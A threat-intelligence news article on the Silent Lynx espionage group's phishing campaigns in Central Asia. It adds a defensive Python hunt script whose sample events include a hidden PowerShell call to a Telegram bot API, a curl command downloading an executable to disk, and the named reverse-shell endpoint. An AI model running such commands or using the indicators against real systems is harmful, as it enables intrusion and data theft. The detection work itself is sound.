![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1fPmPJRLqSkb80PZeZFaS74ZzuOkdMRmMRzBnV1mSf2wv2EVcLhaIzyuewmQTqTINBKrvuzJhP6FFPIWdX0Viwensz5FOmN4bnoqPZitCeTtT6rWL9bKq2LBh5Xu4q1KnD5AlvFbU1Jau_GX8YoTZmJgH_s90AhZS2dc4PgZvOroa4VaSrI5ApeVjMihX/s728-rw-e365/cyber.jpg)
A previously undocumented threat actor tracked as Silent Lynx has been linked to cyber attacks targeting various entities in Kyrgyzstan and Turkmenistan.
"This threat group has previously targeted entities around Eastern Europe and Central Asian government think tanks involved in economic decision-making and the banking sector," said Subhajeet Singha, a researcher at Seqrite Labs, in a report published last month.
The hacking group's targets include embassies, lawyers, government-backed banks and think tanks. The activity has been attributed, with moderate confidence, to a threat actor of Kazakhstani origin.
The infection begins with a spear-phishing email carrying a RAR archive attachment, which ultimately serves as the delivery vehicle for malicious payloads that grant the attacker remote access to the compromised host.
The first of the two campaigns, detected by the cybersecurity company on December 27, 2024, uses the RAR archive to launch an ISO file containing a malicious C++ binary and a decoy PDF. The executable then runs a PowerShell script that uses Telegram bots ("@south_korea145_bot" and "@south_afr_angl_bot") for command execution and data exfiltration.
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiqjTGDze5_u41bJDoMUhhINMnnVhCKGNjTk5_exZvJi5z5XhR3-wvxX1WmtxwBY9Sxc-4vcH0ymnLEA42xqC23BB4YA0aoqkRkQdam4eW17UGKdB1osFF86zk8qTBzau6_qs_tPdbhA0seWGNQdw0ihHutbUUphBJccXaGVC5QeLVTs8u0pR715HjII0z/s728-rw-e365/map.png)
Some of the commands executed via the bots are curl commands that download additional payloads from a remote server ("pweobmxdlboi[.]com") or from Google Drive and save them to disk.
The other campaign, by contrast, uses a malicious RAR archive containing two files: a decoy PDF and a Golang executable, the latter designed to establish a reverse shell to an attacker-controlled server ("185.122.171[.]22:8082").
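The two chains above leave a small set of host-observable traces: an unsigned executable launched from the root of a freshly mounted ISO, a PowerShell command line carrying a Telegram Bot API URL (the bot token sits in the path, `api.telegram.org/bot<id>:<secret>/...`), a curl invocation that writes a second stage to disk, and an unsigned binary opening an outbound connection to a non-web port. The following hunt script is an added example written for this article, not Seqrite's code or telemetry. The events are constructed in a Sysmon-like shape (EventID 1 for process creation, EventID 3 for network connections); every field name, path and the bot token are this example's own assumptions, while the destination 185.122.171[.]22:8082 is the reverse-shell endpoint the report names.

```python
"""Hunt for the Silent Lynx-style delivery chain over constructed events.

Added example for this article, not Seqrite's code. Field names are this
example's own (Sysmon-like: id 1 = process create, id 3 = network connect).
"""
import re

# Executable started from the root of a non-system drive letter: the shape a
# payload has when it runs out of a mounted ISO (heuristic, also hits USB media).
ROOT_OF_NON_SYSTEM_DRIVE = re.compile(r"^[D-Z]:\\[^\\]+\.exe$", re.I)
# Telegram Bot API URLs embed the bot token as "bot<numeric id>:<secret>".
TELEGRAM_BOT_API = re.compile(r"api\.telegram\.org/bot(\d+:[A-Za-z0-9_-]+)", re.I)
# curl told to save its response to a file (-o / -O / --output).
CURL_SAVE_TO_DISK = re.compile(r"\bcurl(?:\.exe)?\b.*\s(?:-o|--output)\b", re.I)
CURL_SOURCE = re.compile(r"https?://(drive\.google\.com|[A-Za-z0-9.-]+)", re.I)
COMMON_WEB_PORTS = {80, 443}

# Constructed sample telemetry: four malicious events followed by two benign ones.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"E:\Report_2025.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"E:\Report_2025.exe"', "signed": False},
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"E:\Report_2025.exe",
     "command_line": r'powershell -w hidden -c "iwr https://api.telegram.org/bot7123456789:AAExampleTokenValueZZZ/getUpdates"',
     "signed": True},
    {"id": 1, "image": r"C:\Windows\System32\curl.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"curl -s https://drive.google.com/uc?export=download&id=1abc -o C:\Users\u\AppData\Local\Temp\upd.exe",
     "signed": True},
    {"id": 3, "image": r"C:\Users\u\Downloads\report\update.exe",
     "dest_ip": "185.122.171.22", "dest_port": 8082, "signed": False},
    {"id": 1, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "parent_image": r"C:\Windows\explorer.exe", "command_line": "firefox.exe", "signed": True},
    {"id": 3, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dest_ip": "93.184.216.34", "dest_port": 443, "signed": True},
]


def _hit(ev, rule, detail):
    return {"rule": rule, "image": ev["image"], "detail": detail}


def check_process(ev):
    """Apply the process-creation rules; returns a list of hits (possibly empty)."""
    hits = []
    img, cmd = ev["image"], ev.get("command_line", "")
    if ROOT_OF_NON_SYSTEM_DRIVE.match(img) and not ev["signed"]:
        hits.append(_hit(ev, "unsigned_exe_from_mounted_image_root", img))
    m = TELEGRAM_BOT_API.search(cmd)
    if m:
        # Keep the numeric bot id for pivoting, redact the secret half of the token
        # so the alert itself does not leak a credential into the SIEM.
        bot_id = m.group(1).split(":")[0]
        hits.append(_hit(ev, "telegram_bot_api_in_command_line", f"{bot_id}:<redacted>"))
    if CURL_SAVE_TO_DISK.search(cmd):
        src = CURL_SOURCE.search(cmd)
        hits.append(_hit(ev, "curl_download_to_disk", src.group(1) if src else "?"))
    return hits


def check_network(ev):
    """Unsigned binary talking to a port that is not ordinary web traffic."""
    if not ev["signed"] and ev["dest_port"] not in COMMON_WEB_PORTS:
        return [_hit(ev, "unsigned_binary_outbound_nonstandard_port",
                     f'{ev["dest_ip"]}:{ev["dest_port"]}')]
    return []


def hunt(events):
    """Run every event through the rule for its type and collect the hits in order."""
    hits = []
    for ev in events:
        hits.extend(check_process(ev) if ev["id"] == 1 else check_network(ev))
    return hits


if __name__ == "__main__":
    for h in hunt(SAMPLE_EVENTS):
        print(f'{h["rule"]:45} {h["image"]}  ({h["detail"]})')
```

Run on the sample events the script raises exactly four hits, one per stage, and stays silent on the two benign browser events. The bot id retained in the Telegram hit is a useful pivot: a bot token recovered from a sample or a script block identifies a specific attacker-controlled bot, so it can be searched for across the estate and, if the full token is available, reported to Telegram for takedown. The mounted-ISO rule is the noisiest of the four on hosts that use removable media; pairing it with a parent of explorer.exe and a missing signature, as above, keeps it usable.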
Seqrite Labs said it observed some tactical overlap between the threat actor and YoroTrooper (aka SturgeonPhisher), which has been linked to attacks targeting Commonwealth of Independent States (CIS) countries using PowerShell and Golang tools.
"Silent Lynx's campaigns demonstrate a sophisticated multi-stage attack strategy using ISO files, C++ loaders, PowerShell scripts, and Golang implants," Singha said.
"These, combined with the reliance on Telegram bots for command and control, the decoy documents and the regional targeting, highlight a focus on espionage in Central Asia and SPECA nations."